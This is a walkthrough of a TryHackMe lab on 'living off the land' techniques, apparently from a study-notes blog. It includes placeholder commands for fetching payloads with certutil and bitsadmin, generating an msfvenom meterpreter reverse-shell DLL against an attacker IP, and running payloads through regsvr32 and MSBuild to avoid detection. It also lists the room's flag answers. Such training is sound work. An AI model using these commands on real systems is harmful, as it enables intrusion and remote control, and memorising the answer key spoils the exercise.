We covered Living Off The Land Binaries that are frequently used in red team engagements. Living Off The Land Binaries are applications and executable that come pre-installed with the operating system. An example is bitsadmin.exe in Windows operating system and ping in Linux. The LOLBAS project contains all binaries that are categorized as living off the land and GTFO bins is its equivalent for Linux operating systems. This was part of the solution walkthrough of TryHackMe Living Off the Land.

What is Living Off The Land?

The term “Living Off The Land” originates from survival scenarios where one uses available resources to survive. In the context of cybersecurity, particularly for red teams, it means using the native tools already present on a compromised target machine (whether Windows or Linux) to achieve objectives. The primary goal of this approach is to evade security defenses and avoid triggering alarms that might occur if custom or foreign tools were downloaded onto the system.

Why Use LOTL Techniques?

LOTL techniques are favored for several reasons:

  • Evade Detection: Using native binaries is significantly less likely to raise suspicion compared to introducing foreign tools, making it harder for security teams to detect malicious activity.
  • Bypass Security: This approach can help bypass various security measures, including application whitelisting, which typically prevents unauthorized executables from running.
  • Perform Various Actions: LOTL binaries are versatile and can be used for a wide range of activities, such as reconnaissance, file operations (downloading, uploading), lateral movement within a network, and even code execution.

Resources for Finding LOTL Binaries

I learned about two key resources for identifying legitimate binaries that can be abused for LOTL purposes:

  • LOLBAS (Living Off The Land Binaries and Scripts): This is a project that meticulously documents Windows binaries, scripts, and libraries that can be used for LOTL purposes. Binaries are categorized by MITRE ATT&CK techniques, their function (e.g., download, execute), and type. I can search by function (e.g., /download, /execute), binary name, or even a specific ATT&CK technique ID.
  • GTFOBins: This is the Linux equivalent of LOLBAS, similarly categorizing binaries by their potential function (e.g., file download).

Demonstrated LOTL Binaries and Techniques (Windows)

The video provided practical demonstrations of several Windows LOTL binaries:

  1. certutil.exe:
    • Originally designed for managing certification services, attackers abuse it to download files/payloads.
    • Conceptual command: certutil -urlcache -split -f <URL_to_payload> <local_path_to_save>
  2. bitsadmin.exe:
    • Manages the Background Intelligent Transfer Service (BITS). Attackers use it to download files.
    • Conceptual command: bitsadmin /transfer /download /priority foreground <URL_to_payload> <local_path_to_save>
    • A demonstration showed downloading a payload.txt file.
  3. explorer.exe:
    • The native Windows file explorer. It can be used to execute commands or payloads.
    • Conceptual command: explorer.exe /root,<path_to_executable>
    • Demonstrated by launching calc.exe.
  4. rundll32.exe:
    • Used to run functions from DLLs. It can execute commands/payloads using JavaScript. The video noted that this method might be detected by security software like Windows Defender.
  5. regsvr32.exe / regsvr64.exe:
    • Used to register and unregister DLLs. This can be abused to bypass application whitelisting.
    • Demonstration Steps:
      • A DLL payload was generated using msfvenom.
      • The DLL was downloaded to the target using bitsadmin.
      • A listener was set up using Metasploit (msfconsole).
      • regsvr32.exe was then used to execute the downloaded DLL, which established a reverse shell back to the attacker’s listener.
    • Conceptual command for msfvenom (to generate payload): msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<port> -f dll > payload.dll
    • Conceptual command for msfconsole (listener): use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <attacker_IP> set LPORT <port> exploit
    • Conceptual command for regsvr32.exe: regsvr32.exe /s /i:<URL_to_DLL> scrobj.dll (if hosted remotely) or regsvr32.exe /s /i:"C:\path\to\payload.dll" scrobj.dll (if local)
  6. MSBuild.exe:
    • A native platform for building Windows applications. It can be used to execute PowerShell scripts remotely without directly spawning powershell.exe. This requires converting the PowerShell script (.ps1) into a C# project file (.csproj).
    • The tool “PowerLessShell” (or “No PowerShell”) is used for this conversion.
    • Demonstration Steps:
      • A malicious PowerShell script was generated with msfvenom.
      • The .ps1 script was downloaded to the target (though the video mentioned it should ideally be converted first on the attacker machine).
      • PowerLessShell (a Python script) converted the .ps1 to a .csproj file on the attacker’s machine.
      • The .csproj file (presumably transferred to the target, though this final transfer step wasn’t explicitly shown) was executed using MSBuild.exe, aiming to get a reverse shell.
    • Conceptual command for PowerLessShell (on attacker machine): python powerlessshell.py -f <path_to_ps1_script> -o <output_csproj_file>
    • Conceptual command for MSBuild.exe (on target machine): C:\Windows\Microsoft.NET\Framework\<version>\MSBuild.exe C:\path\to\payload.csproj
    • The path to MSBuild.exe is typically under C:\Windows\Microsoft.NET\Framework\<version>\.

Additional resources

  • GTFOBins – The Linux version of the LOLBAS project.
  • Astaroth: Banking Trojan – A real-life malware analysis where they showcase using the Living Off the Land technique used by Malware.

Room Answers

Visit the LOLBAS project’s website and check out its functionalities. Then, using the search bar, find the ATT&CK ID: T1040. What is the binary’s name?

Pktmon.exe

Use the search bar to find more information about MSbuild.exe. What is the ATT&CK ID?T1127.001

Use the search bar to find more information about Scriptrunner.exe. What is the function of the binary?

Execute


Run bitsadmin.exe to download a file of your choice onto the attached Windows VM. Once you have executed the command successfully, an encoded flag file will be created automatically on the Desktop. What is the file name?

enc_thm_0YmFiOG_file.txt

Use the certutil.exe tool to decode the encoded flag file from question #1. In order to decode the file, we use -decode option as follow:

C:\Users\thm> certutil -decode Encoded_file payload.txt

THM{ea4e2b9f362320d098635d4bab8a568e}


Replicate the steps of the No PowerShell technique to receive a reverse shell on port 4444. Once a connection is established, a flag will be created automatically on the desktop. What is the content of the flag file?

THM{23005dc4369a0eef728aa39ff8cc3be2}

Video Walkthrough

, ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles